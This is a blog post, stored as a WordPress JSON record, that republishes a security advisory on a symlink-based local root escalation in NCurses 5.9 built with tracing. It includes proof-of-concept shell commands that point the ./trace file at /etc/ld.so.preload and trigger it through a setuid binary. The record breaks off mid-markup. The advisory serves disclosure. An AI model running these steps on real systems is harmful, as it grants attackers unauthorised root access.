{"id":6436,"date":"2017-01-30T14:20:38","date_gmt":"2017-01-30T22:20:38","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/30\/news-273\/"},"modified":"2017-01-30T14:20:38","modified_gmt":"2017-01-30T22:20:38","slug":"news-273","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/30\/news-273\/","title":{"rendered":"SSD Advisory \u2013  NCurses 5.9 Local Privilege Escalation"},"content":{"rendered":"<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an Local Privilege Escalation vulnerability in NCurses, version 5.9. <\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher Dawid Golunski (<a href=\"https:\/\/legalhackers.com\/\" target=\"_blank\">https:\/\/legalhackers.com\/<\/a>) has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> NCurses has released a <a href=\"http:\/\/invisible-island.net\/ncurses\/NEWS.html#t20161126\">patch<\/a> to address the vulnerability.<\/p>\n<p>Thomas Dickey has also added the following statement &#8220;I don&#8217;t know of any actual packages which have traces enabled by default&#8221;.<\/p>\n<p><span id=\"more-2961\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> When NCurses, downloaded from official mirror<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-588fbc3496f2d775927087\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> https:\/\/ftp.gnu.org\/pub\/gnu\/ncurses\/ncurses-5.9.tar.gz<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>And NCurses is compiled with trace option:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-588fbc3496f36170538061\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [root@centos7 ncurses-6.0]# .\/configure &#8211;help | grep -i trace &#8211;with-trace test: add trace() function to all models of ncurses<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f36170538061-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f36170538061-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-e\">centos7 <\/span><span class=\"crayon-v\">ncurses<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">6.0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-p\"># .\/configure &#8211;help | grep -i trace &#8211;with-trace test: add trace() function to all models of ncurses<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p>It allows for <em>NCURSES_TRACE<\/em> environment variable as explained at:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-588fbc3496f39112190812\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> https:\/\/linux.die.net\/man\/3\/ncurses<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f39112190812-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f39112190812-1\"><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/linux.die.net\/man\/3\/ncurses<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>When the environment variable is set , a program that makes use of NCurses library writes certain tracing information to <em>.\/trace<\/em> file in the current directory.<\/p>\n<p>The library Fails to check for an existence of a <em>symlink <\/em>and set appropriate <em>umask <\/em>settings.<\/p>\n<p>This could be abused by attackers to exploit root <em>suid<\/em> binaries that make use of a vulnerable ncurses library to achieve privilege escalation. <\/p>\n<p><strong>Proof of Concept<\/strong><br \/> For simplicity we can assign SUID root privileges on clear binary:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-588fbc3496f3c645802993\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> chmod +s \/bin\/clear  chown root:root \/bin\/clear    [xxxxx@centos7 ~]$ ls -l \/bin\/clear  -rwsr-xr-x. 1 root root 8792 May 14 16:53 \/bin\/clear<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f3c645802993-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f3c645802993-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f3c645802993-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f3c645802993-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f3c645802993-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f3c645802993-1\"><span class=\"crayon-v\">chmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">clear<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f3c645802993-2\"><span class=\"crayon-e\">chown <\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">clear<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f3c645802993-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f3c645802993-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">xxxxx<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">centos7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ls<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">l<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">clear<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f3c645802993-5\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rwsr<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">xr<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root <\/span><span class=\"crayon-i\">root<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8792<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">May<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">clear<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>Which uses NCurses:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-588fbc3496f3e544636518\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [xxxxx@centos7 ~]$ ldd \/bin\/clear  linux-vdso.so.1 =&gt; (0x00007ffe335e4000)  libncurses.so.5 =&gt; \/lib\/libncurses.so.5 (0x00007feecbb29000)  libc.so.6 =&gt; \/lib64\/libc.so.6 (0x00007feecb768000)  \/lib64\/ld-linux-x86-64.so.2 (0x00007feecbd92000)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f3e544636518-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f3e544636518-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f3e544636518-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f3e544636518-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f3e544636518-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f3e544636518-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">xxxxx<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">centos7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ldd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">clear<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f3e544636518-2\"><span class=\"crayon-v\">linux<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">vdso<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x00007ffe335e4000<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f3e544636518-3\"><span class=\"crayon-v\">libncurses<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">lib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">libncurses<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x00007feecbb29000<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f3e544636518-4\"><span class=\"crayon-v\">libc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">lib64<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">libc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x00007feecb768000<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f3e544636518-5\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">lib64<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">linux<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">x86<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">64.so.2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x00007feecbd92000<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>Although programs such as <em>htop<\/em> or <em>ntop<\/em> could be used as an alternative as these are often recommended to have root suid on their binaries.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-588fbc3496f40501298763\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [xxxxx@centos7 ~]$ id  uid=1000(xxxxx) gid=1000(xxxxx)    [xxxxx@centos7 ~]$ umask 006    [xxxxx@centos7 ~]$ ln -s \/etc\/ld.so.preload trace    [xxxxx@centos7 ~]$ ls -l trace   lrwxrwxrwx. 1 xxxxx wheel 18 May 15 00:32 trace -&gt; \/etc\/ld.so.preload  [xxxxx@centos7 ~]$ pwd  \/home\/xxxxx    [xxxxx@centos7 ~]$ export NCURSES_TRACE=20; clear<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f40501298763-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f40501298763-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f40501298763-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f40501298763-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f40501298763-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f40501298763-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f40501298763-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f40501298763-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f40501298763-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f40501298763-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f40501298763-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f40501298763-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f40501298763-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f40501298763-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">xxxxx<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">centos7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">id<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f40501298763-2\"><span class=\"crayon-v\">uid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xxxxx<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xxxxx<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f40501298763-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f40501298763-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">xxxxx<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">centos7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">umask<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">006<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f40501298763-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f40501298763-6\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">xxxxx<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">centos7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> 